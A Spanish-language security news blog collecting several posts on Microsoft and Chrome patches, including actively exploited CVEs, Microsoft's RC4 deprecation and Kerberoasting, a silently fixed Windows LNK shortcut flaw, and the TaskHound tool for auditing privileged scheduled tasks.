Microsoft publicó el parche de emergencia KB5084597 el 13 de marzo de 2026, fuera de su calendario de actualizaciones habitual. Este es un hotpatch (sin reinicio) fuera de ciclo (Out of Band - OOB) para corregir una vulnerabilidad de ejecución remota de código (RCE) en el componente Routing and Remote Access Service (RRAS) de Windows 11 Enterprise.

Las vulnerabilidades (CVE-2026-25172, CVE-2026-25173 y CVE-2026-26111) afectan al servicio de enrutamiento y acceso remoto de Windows (RRAS). Se da la circunstancia de que ya habían sido corregidos en un parche anterior y en calendario, pero ahora se publican de esta forma para los sistemas que usan el método de hotpatch.

Los atacantes podrían explotar estas vulnerabilidades para ejecutar código malicioso de forma remota, lo que conlleva el riesgo de robo de datos e intrusiones en la red. El parche se instala instantáneamente en los dispositivos Windows 11 compatibles, sin necesidad de reiniciar.

No se han reportado efectos secundarios conocidos; el parche incluye la última actualización de la pila de servicios para mayor estabilidad. Por ahora no se conoce si las vulnerabilidades estén siendo explotadas activamente.

Actualizaciones de Google Chrome

Google publicó el jueves actualizaciones de seguridad para su navegador Chrome para solucionar dos vulnerabilidades de alta gravedad que, según la compañía, han sido explotadas.

  • CVE-2026-3909 (CVSS: 8.8): Una vulnerabilidad de escritura fuera de límites en la biblioteca gráfica 2D Skia que permite a un atacante remoto acceder a memoria fuera de límites mediante una página HTML manipulada.
  • CVE-2026-3910 (CVSS: 8.8): Una vulnerabilidad de implementación inadecuada en el motor V8 de JavaScript y WebAssembly que permite a un atacante remoto ejecutar código arbitrario dentro de un entorno aislado mediante una página HTML manipulada.

Ambas vulnerabilidades fueron descubiertas e informadas por Google el 10 de marzo de 2026. "Google sabe que existen exploits para CVE-2026-3909 y CVE-2026-3910", señaló la compañía.

Fuente: THN

Feb 11, 2026

Actualizaciones de seguridad de FEBRERO para todas las empresas

Ayer martes Microsoft lanzó actualizaciones de seguridad para abordar 59 fallas en su software, incluyendo seis vulnerabilidades que, según afirma, han sido explotadas in situ.

De las 59 fallas, cinco se consideran críticas, 52 importantes y dos moderadas. ISC detalla el número de errores en cada categoría de vulnerabilidad:

  • 25 vulnerabilidades de elevación de privilegios
  • 5 vulnerabilidades de omisión de funciones de seguridad
  • 12 vulnerabilidades de ejecución remota de código
  • 6 vulnerabilidades de divulgación de información
  • 3 vulnerabilidades de denegación de servicio
  • 7 vulnerabilidades de suplantación de identidad
Para obtener más información sobre las actualizaciones no relacionadas con la seguridad publicadas hoy, puede revisar nuestros artículos dedicados a las actualizaciones acumulativas KB5077181 y KB5075941 de Windows 11 y la actualización de seguridad extendida KB5075912 de Windows 10.

Cabe destacar que estos parches se suman a tres fallos de seguridad que Microsoft ha abordado en su navegador Edge desde el lanzamiento de la actualización del martes de parches de enero de 2026. Estos fallos incluyen una vulnerabilidad moderada que afecta al navegador Edge para Android (CVE-2026-0391, CVSS: 6,5) y que podría permitir a un atacante no autorizado realizar suplantación de identidad a través de una red aprovechando una "tergiversación de información crítica en la interfaz de usuario".

Esta actualización también coincide con el lanzamiento por parte de Microsoft de Certificados de Arranque Seguro actualizados para reemplazar los certificados originales de 2011, que expirarán a finales de junio de 2026. Los nuevos certificados se instalarán mediante el proceso de actualización mensual de Windows sin necesidad de realizar ninguna acción adicional.

Microsoft reveló sus planes de actualizar los Certificados de Arranque Seguro que estaban a punto de vencer en los sistemas Windows 11 24H2 y 25H2 elegibles en enero, luego de una alerta de noviembre que advertía a los administradores de TI que actualizaran los certificados de seguridad utilizados para validar el firmware UEFI antes de que vencieran.

Vulnerabilidades explotadas activamente

Encabezando la lista de actualizaciones de este mes se encuentran seis vulnerabilidades que se han marcado como explotadas activamente:

  • CVE-2026-21510 (CVSS: 8,8): Un fallo del mecanismo de protección en Windows Shell que permite a un atacante no autorizado eludir una función de seguridad a través de una red.
  • CVE-2026-21513 (CVSS: 8,8): Un fallo del mecanismo de protección en MSHTML Framework que permite a un atacante no autorizado eludir una función de seguridad a través de una red. "Se debe a un fallo en el mecanismo de protección que permite a los atacantes eludir las solicitudes de ejecución cuando los usuarios interactúan con archivos maliciosos. Un archivo manipulado puede eludir silenciosamente las solicitudes de seguridad de Windows y desencadenar acciones peligrosas con un solo clic".
  • CVE-2026-21514 (CVSS: 7.8): Dependencia de entradas no confiables en una decisión de seguridad en Microsoft Office Word, lo que permite a un atacante no autorizado eludir una función de seguridad localmente.
  • CVE-2026-21519 (CVSS: 7.8): Acceso a un recurso mediante un tipo incompatible (confusión de tipos) en el Administrador de ventanas del escritorio, lo que permite a un atacante autorizado elevar privilegios localmente.
  • CVE-2026-21525 (CVSS: 6.2): ​​Desreferencia de puntero nulo en el Administrador de conexión de acceso remoto de Windows, que permite a un atacante no autorizado denegar el servicio localmente.
  • CVE-2026-21533 (CVSS: 7.8): Gestión incorrecta de privilegios en el Escritorio remoto de Windows, que permite a un atacante autorizado elevar privilegios localmente.

Satnam Narang, ingeniero sénior de investigación de Tenable, afirmó que CVE-2026-21513 y CVE-2026-21514 presentan numerosas similitudes con CVE-2026-21510. La principal diferencia radica en que CVE-2026-21513 también puede explotarse mediante un archivo HTML, mientras que CVE-2026-21514 solo puede explotarse mediante un archivo de Microsoft Office.

En cuanto a CVE-2026-21525, está vinculada a una vulnerabilidad Zero-Day que el servicio 0patch de ACROS Security afirmó haber descubierto en diciembre de 2025 mientras investigaba otra falla relacionada en el mismo componente (CVE-2025-59230).

Por su lado, CVE-2026-21519 y CVE-2026-21533 son ​​vulnerabilidades de escalamiento de privilegios locales, lo que significa que un atacante ya debe haber obtenido acceso a un host vulnerable. Esto podría ocurrir mediante un archivo adjunto malicioso, una vulnerabilidad de ejecución remota de código o un movimiento lateral desde otro sistema comprometido.

CVE-2026-21533 tiene un vector de ataque local, baja complejidad y requisitos de privilegios reducidos. No requiere interacción del usuario. La vulnerabilidad surge de una gestión deficiente de privilegios en los componentes de RDS. CrowdStrike observó un binario de explotación que modifica una clave de registro de configuración de servicio, sustituyéndola por una controlada por el atacante. Esta alteración permite la escalamiento de privilegios, como la adición de un nuevo usuario al grupo Administradores, lo que otorga privilegios completos de SYSTEM. Los atacantes necesitan acceso local inicial con pocos privilegios, lo que la hace ideal para la explotación posterior en entornos RDP.

Adam Meyers, de CrowdStrike, advirtió: "Es probable que los actores de amenazas que posean los binarios del exploit aceleren sus intentos de usar o vender CVE-2026-21533 a corto plazo". Aún no existe una atribución específica al adversario, pero los sistemas RDS son objetivos prioritarios de movimiento lateral.

Este desarrollo ha llevado a CISA a añadir las seis vulnerabilidades a su catálogo de Vulnerabilidades Explotadas Conocidas (KEV).

Tres vulnerabilidades críticas en Microsoft Azure

  • CVE-2026-24300 es una vulnerabilidad crítica de elevación de privilegios que afecta a Azure Front Door y tiene una puntuación CVSS de 9,8. Esta vulnerabilidad permite a atacantes remotos sin privilegios elevar privilegios mediante un control de acceso inadecuado en Azure Front Door. La vulnerabilidad no requiere la interacción del usuario.
  • CVE-2026-24302 es una vulnerabilidad crítica de elevación de privilegios que afecta a Azure Arc y tiene una puntuación CVSS de 8,6. Esta vulnerabilidad permite a atacantes remotos sin privilegios elevar privilegios mediante un control de acceso inadecuado en Azure Arc. La vulnerabilidad no requiere la interacción del usuario.
  • CVE-2026-21532 es una vulnerabilidad crítica de divulgación de información que afecta a Azure Functions y tiene una puntuación CVSS de 8,2. Esta vulnerabilidad permite a atacantes remotos sin privilegios acceder a información confidencial mediante la exposición de dicha información a actores no autorizados en Azure Functions. La vulnerabilidad no requiere la interacción del usuario.

Iniciativas de seguridad por diseño

Paralelamente, la compañía afirmó que también está reforzando las protecciones predeterminadas de Windows mediante dos iniciativas de seguridad: el Modo de Seguridad Base de Windows y la Transparencia y Consentimiento del Usuario. Las actualizaciones se enmarcan en la Iniciativa de Futuro Seguro (SFI) y la Iniciativa de Resiliencia de Windows (WRI). En este modo, Windows avanzará hacia el funcionamiento con las protecciones de integridad en tiempo de ejecución habilitadas de forma predeterminada. Estas protecciones garantizan que solo se puedan ejecutar aplicaciones, servicios y controladores debidamente firmados, lo que ayuda a proteger el sistema de manipulaciones o cambios no autorizados.

  • Seguridad por diseño: La seguridad es prioritaria al diseñar cualquier producto o servicio.
  • Seguridad por defecto: Las protecciones de seguridad están habilitadas y se aplican por defecto, no requieren ningún esfuerzo adicional y no son opcionales.
  • Operaciones seguras: Los controles y la monitorización de la seguridad se mejorarán continuamente para hacer frente a las ciberamenazas actuales y futuras.

La Transparencia y Consentimiento del Usuario, similar al marco de Transparencia, Consentimiento y Control (TCC) de macOS de Apple, busca implementar un enfoque coherente para la gestión de decisiones de seguridad. El sistema operativo avisará a los usuarios cuando las aplicaciones intenten acceder a recursos confidenciales, como archivos, la cámara o el micrófono, o cuando intenten instalar software no deseado.

También se espera que las aplicaciones y los agentes de IA cumplan con estándares de transparencia más estrictos, lo que brindará a los usuarios y administradores de TI una mejor visibilidad de sus comportamientos.

Actualizaciones de otras empresas

Fuente: THN

Dec 19, 2025

Microsoft finalmente elimina el cifrado RC4 (verifica tu AD)

RC4 debía morir hace mucho. Tras más de una década de ataques devastadores que lo explotaron y que recientemente recibió duras críticas de un destacado senador estadounidense, Microsoft está eliminando un cifrado obsoleto y vulnerable que Windows ha soportado y dado problemas durante 26 años.

Cuando el fabricante de software lanzó Active Directory en el año 2000, convirtió a RC4 en el único medio para proteger el componente de Windows, que los administradores utilizan para configurar y aprovisionar cuentas de administrador y usuario en grandes organizaciones.

RC4, abreviatura de Rivest Cipher 4, es un homenaje al matemático y criptógrafo Ron Rivest, de RSA Security, quien desarrolló el cifrado de flujo en 1987. A los pocos días de que el algoritmo, protegido por secreto comercial, se filtrara en 1994, un investigador demostró un ataque criptográfico que debilitó significativamente la seguridad que se creía que proporcionaba. A pesar de su conocida vulnerabilidad, RC4 siguió siendo un elemento básico en los protocolos de cifrado, incluyendo SSL y su sucesor, TLS, hasta hace aproximadamente una década.

Adiós a lo viejo

Uno de los principales reticentes a dar soporte a RC4 ha sido Microsoft. Finalmente, Microsoft actualizó Active Directory para que admitiera el estándar de cifrado AES, mucho más seguro. Sin embargo, por defecto, los servidores Windows han seguido respondiendo a las solicitudes de autenticación basadas en RC4 y devolviendo una respuesta basada en RC4.

En intrusiones reales, los actores de amenazas han utilizado flujos Kerberos con RC4 habilitado para descifrar contraseñas de cuentas de servicio sin conexión y moverse lateralmente por las redes, a menudo evadiendo la detección y sin activar alertas vinculadas a las defensas de endpoints o perimetrales. Estas técnicas han ayudado a que los atacantes se centren en los sistemas de identidad como objetivo principal.

El respaldo a RC4 ha sido una debilidad predilecta de los atacantes para comprometer las redes empresariales. En septiembre, el senador estadounidense Ron Wyden (demócrata por Oregón) solicitó a la Comisión Federal de Comercio que "investigara a Microsoft por negligencia grave en ciberseguridad", citando la continua compatibilidad predeterminada con RC4.

La semana pasada, Microsoft anunció la descontinuación definitiva de RC4 y mencionó su susceptibilidad al Kerberoasting Mitre ATT&CK T1558-003), un tipo de ataque conocido desde 2014 que fue la causa principal de la intrusión inicial en la red de Ascension, en septiembre pasado.

"A mediados de 2026, actualizaremos la configuración predeterminada del controlador de dominio para el Centro de Distribución de Claves Kerberos (KDC) en Windows Server 2008 y versiones posteriores para permitir únicamente el cifrado AES-SHA1", escribió Matthew Palko, gerente principal de programas de Microsoft. "RC4 estará deshabilitado de forma predeterminada y solo se usará si un administrador de dominio configura explícitamente una cuenta o el KDC para su uso".

AES-SHA1, un algoritmo ampliamente considerado seguro, ha estado disponible en todas las versiones compatibles de Windows desde el lanzamiento de Windows Server 2008. Desde entonces, los clientes de Windows se autenticaban de forma predeterminada utilizando este estándar, mucho más seguro, y los servidores respondían utilizando el mismo. Sin embargo, los servidores Windows, también por defecto, responden a las solicitudes de autenticación basadas en RC4 y devuelven una respuesta basada en RC4, lo que deja las redes expuestas al Kerberoasting.

Tras el cambio del próximo año, la autenticación RC4 dejará de funcionar a menos que los administradores realicen el trabajo adicional necesario para habilitarla. Mientras tanto, según Palko, es crucial que los administradores identifiquen cualquier sistema dentro de sus redes que dependa del cifrado. A pesar de las vulnerabilidades conocidas, RC4 sigue siendo el único medio que utilizan algunos sistemas heredados de terceros para autenticarse en redes Windows. Estos sistemas a menudo pasan desapercibidos en las redes, a pesar de ser necesarios para funciones cruciales.

Para agilizar la identificación de estos sistemas, Microsoft ofrece varias herramientas. Una de ellas es una actualización de los registros del KDC que rastreará tanto las solicitudes como las respuestas que los sistemas realizan mediante RC4 al realizar solicitudes a través de Kerberos. Kerberos es un protocolo de autenticación utilizado en todo el sector para verificar la identidad de usuarios y servicios en una red no segura.

Microsoft también está introduciendo nuevos scripts de PowerShell para analizar los registros de eventos de seguridad e identificar con mayor facilidad el uso problemático de RC4.

Microsoft afirmó haber trabajado incansablemente durante la última década para descontinuar RC4, pero que la tarea no fue fácil.

Para determinar la mejor configuración para su entorno, consulte la Serie de fortalecimiento de Active Directory - Parte 4: Aplicación de AES para Kerberos y Descifrado de la selección de tipos de cifrado Kerberos compatibles.

Sin salt, sin iteración

"El problema, sin embargo, es que es difícil eliminar un algoritmo criptográfico presente en todos los sistemas operativos lanzados durante los últimos 25 años y que fue el algoritmo predeterminado durante tanto tiempo", escribió Steve Syfuhs, quien dirige el equipo de Autenticación de Windows de Microsoft, en Bluesky. "El problema no es que el algoritmo exista. El problema es cómo se elige el algoritmo y las reglas que lo rigen a lo largo de 20 años de cambios de código".

Durante esas dos décadas, los desarrolladores descubrieron una serie de vulnerabilidades críticas de RC4 que requerían correcciones quirúrgicas. Microsoft consideró descontinuar RC4 para este año, pero finalmente lo descartó tras descubrir vulnerabilidades que requerían aún más correcciones. Durante ese tiempo, Microsoft introdujo algunas "mejoras menores" que favorecieron el uso de AES y, como resultado, su uso se redujo drásticamente.

"En un año, observamos que el uso de RC4 se redujo prácticamente a cero". Esto no es malo y, de hecho, nos dio mucha más flexibilidad para eliminarlo por completo, porque sabíamos que realmente no iba a perjudicar a la gente, ya que no lo estaban usando. Syfuhs continuó documentando desafíos adicionales que Microsoft enfrentó y el enfoque que adoptó para resolverlos.

Si bien RC4 presenta vulnerabilidades de cifrado conocidas que lo hacen inseguro, Kerberoasting explota una vulnerabilidad distinta. Tal como se implementa en la autenticación de Active Directory, no utiliza salt criptográfica y solo utiliza una ronda de la función hash MD4. La salt es una técnica que añade información aleatoria a cada contraseña antes de que se convierta en hash. Esto requiere que los atacantes inviertan una cantidad considerable de tiempo y recursos para descifrar el hash. MD4, por otro lado, es un algoritmo rápido que requiere pocos recursos. La implementación de AES-SHA1 por parte de Microsoft es mucho más lenta e itera el hash para ralentizar aún más los esfuerzos de descifrado. En conjunto, descifrar contraseñas con hash AES-SHA1 requiere aproximadamente 1.000 veces más tiempo y recursos.

Los administradores de Windows deberían auditar sus redes para detectar cualquier uso de RC4. Dada su amplia adopción y uso continuo en toda la industria, es posible que aún esté activo, para sorpresa y disgusto de quienes se encargan de la defensa contra los atacantes.

Fuente: Arstechnica

Dec 4, 2025

Microsoft corrige silenciosamente la falla de Windows LNK tras años de explotación activa

De acuerdo a ACROS Security's 0patch, Microsoft ha solucionado silenciosamente una falla de seguridad que ha sido explotada por varios actores de amenazas desde 2017 como parte de las actualizaciones del martes de parches de noviembre de 2025.

La vulnerabilidad en cuestión es CVE-2025-9491 (CVSS: 7.8/7.0), descrita como una vulnerabilidad de interpretación errónea de la interfaz de usuario del archivo de acceso directo de Windows (LNK) que podría provocar la ejecución remota de código.

"La falla específica existe en el manejo de archivos .LNK. Los datos manipulados en un archivo .LNK pueden hacer que el contenido peligroso del archivo sea invisible para un usuario que lo inspeccione a través de la interfaz de usuario de Windows. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del usuario actual".

En otras palabras, estos archivos de acceso directo están diseñados de tal manera que, al ver sus propiedades en Windows, los comandos maliciosos que ejecutan quedan ocultos a la vista del usuario mediante el uso de varios espacios en blanco. Para activar su ejecución, los atacantes podrían disfrazar los archivos como documentos inofensivos.

Los detalles de la vulnerabilidad surgieron por primera vez en marzo de 2025, cuando la la iniciativa Zero Day Initiative (ZDI) reveló que el problema había sido explotado por 11 grupos patrocinados por estados de China, Irán, Corea del Norte y Rusia como parte de campañas de robo de datos, espionaje y con fines financieros, algunas de las cuales datan de 2017. El problema también se conoce como ZDI-CAN-25373 y este es el informe técnico y el video de su explotación.

En ese momento, Microsoft declaró que la vulnerabilidad no cumplía los requisitos para una reparación inmediata y que consideraría corregirla en una futura versión. También se indicó que el formato de archivo LNK está bloqueado en Outlook, Word, Excel, PowerPoint y OneNote, por lo que cualquier intento de abrir dichos archivos activará una advertencia para que los usuarios no abran archivos de fuentes desconocidas.

Posteriormente, un informe de HarfangLab descubrió que un clúster de ciberespionaje conocido como XDSpy aprovechó la vulnerabilidad para distribuir XDigo, un malware basado en Go, en ataques dirigidos a entidades gubernamentales de Europa del Este, el mismo mes en que se divulgó la vulnerabilidad.

Posteriormente, a finales de octubre de 2025, el problema reapareció por tercera vez después de que Arctic Wolf detectara una campaña ofensiva en la que actores de amenazas afiliados a China utilizaron la falla como arma en ataques dirigidos a entidades diplomáticas y gubernamentales europeas y distribuyeron el malware PlugX.

Este desarrollo impulsó a Microsoft a emitir una guía formal sobre CVE-2025-9491, reiterando su decisión de no aplicar un parche y enfatizando que la considera una vulnerabilidad "debido a la interacción del usuario y a que el sistema ya advierte a los usuarios que este formato no es confiable".

0patch indicó que la vulnerabilidad no solo consiste en ocultar la parte maliciosa del comando en el campo "Objetivo", sino también en que un archivo LNK permite que los argumentos del "Objetivo" sean una cadena muy larga (decenas de miles de caracteres), pero el cuadro de diálogo "Propiedades" solo muestra los primeros 260 caracteres, eliminando el resto sin que nadie lo sepa.

Esto también significa que un atacante puede crear un archivo LNK que ejecute un comando largo, lo que provocaría que solo se muestren los primeros 260 caracteres al usuario que vio sus propiedades. El resto de la cadena de comandos simplemente se trunca. Según Microsoft, la estructura del archivo, en teoría, permite cadenas de hasta 32.000 caracteres.

El parche silencioso publicado por Microsoft soluciona el problema mostrando en el cuadro de diálogo Propiedades el comando "Destino" completo con argumentos, independientemente de su longitud. Dicho esto, este comportamiento depende de la posibilidad de que existan archivos de acceso directo con más de 260 caracteres en su campo "Destino".

El microparche de 0patch para la misma falla toma una ruta diferente: muestra una advertencia cuando los usuarios intentan abrir un archivo LNK con más de 260 caracteres.

"Aunque se podrían construir accesos directos maliciosos con menos de 260 caracteres, creemos que interrumpir los ataques reales detectados puede marcar una gran diferencia para los objetivos", declaró.

Fuente: THN

Nov 22, 2025

TaskHound: detecta tareas programadas de Windows que se ejecutan con privilegios elevados y credenciales almacenadas.

TaskHound, una nueva herramienta de seguridad de código abierto que ayuda a profesionales de seguridad a identificar tareas programadas de Windows de alto riesgo que podrían exponer los sistemas a ataques.

La herramienta descubre automáticamente las tareas que se ejecutan con cuentas privilegiadas y credenciales almacenadas, lo que la convierte en un valioso complemento para las evaluaciones de seguridad.

TaskHound destaca por automatizar la detección de tareas programadas peligrosas en redes Windows. En lugar de buscar manualmente en los registros del sistema, la herramienta escanea máquinas remotas a través de SMB y analiza los archivos XML de las tareas para identificar vulnerabilidades de seguridad.

Busca tareas que se ejecuten con cuentas administrativas, usuarios con privilegios o cuentas de Nivel 0, que suelen ser los objetivos de mayor valor para los atacantes. TaskHound incluye varias funciones potentes para la búsqueda de amenazas. Detecta automáticamente las tareas asignadas a usuarios de Nivel 0, como administradores de dominio y administradores empresariales.

La herramienta analiza cuándo se modificaron las credenciales por última vez en comparación con la fecha de creación de las tareas, lo que ayuda a identificar contraseñas antiguas que podrían ser vulnerables a ataques sin conexión.

TaskHound también puede funcionar sin conexión, analizando archivos XML recopilados previamente sin necesidad de acceso directo a la red.

Para los operadores que utilizan AdaptixC2, la herramienta incluye una implementación de archivo de objeto Beacon. Durante una prueba de penetración, TaskHound identifica rápidamente oportunidades de explotación. Las tareas que se ejecutan en cuentas comprometidas pueden ser manipuladas para obtener acceso al sistema.

La herramienta proporciona informes detallados que muestran la ubicación de las tareas, las credenciales asociadas, las fechas de creación y los pasos a seguir recomendados para cada hallazgo.

La herramienta se integra con BloodHound, una popular plataforma de visualización de seguridad de red. La plataforma es compatible tanto con la versión moderna de BloodHound Community Edition como con las versiones anteriores, lo que la hace compatible con la infraestructura de seguridad existente. Esta integración permite a los equipos de seguridad correlacionar automáticamente las tareas programadas con los datos de la ruta de ataque de BloodHound, revelando qué tareas representan el mayor riesgo en su entorno.

La hoja de ruta del proyecto incluye un conector directo a la base de datos de BloodHound y un módulo NetExec específico para ampliar la integración con otros marcos de seguridad populares.

El desarrollador de GitHub también planea la extracción automatizada de credenciales para el descifrado sin conexión.

Fuente: SecurityNews